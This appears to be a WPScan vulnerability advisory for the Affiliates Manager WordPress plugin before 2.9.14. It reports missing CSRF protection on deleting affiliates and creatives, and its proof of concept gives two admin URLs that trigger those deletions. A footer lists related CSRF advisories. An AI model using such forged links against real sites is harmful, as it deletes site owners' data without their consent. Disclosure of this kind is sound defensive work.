Affiliates Manager < 2.9.14 – Arbitrary Affiliates & Creatives Deletion via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks when deleting affiliates and creatives, which could allow attackers to make a logged in admin perform such actions via CSRF attacks

Proof of Concept

Make a logged in admin open
- https://example.com/wp-admin/admin.php?page=wpam-affiliates&delete_aid=2
- http://example.com/wp-admin/admin-ajax.php?handler=deleteCreative&creativeId=2&action=wpam-ajax_request

Affects Plugins

affiliates-manager

Fixed in 2.9.14

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

e4328bb5-cf74-496f-a66d-5b3f83a9ef51

Timeline

Publicly Published

2022-08-16 (about 3 years ago)

Added

2022-08-16 (about 3 years ago)

Last Updated

2022-08-16 (about 3 years ago)

Other

Published

Title

Published

2024-11-01

Title

While Loading <= 3.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2021-06-30

Title

Cognitive Content Analyzer < 2.3 - Unauthorised AJAX call via CSRF

Published

2023-12-22

Title

HUSKY < 1.3.4.4 - Multiple Connections/Stats CSRF

Published

2024-06-03

Title

Emergency Password Reset < 9.0 - Cross-Site Request Forgery

Published

2024-06-20

Title

Digital Newspaper < 1.1.6 - Cross-Site Request Forgery to Notice Dismissal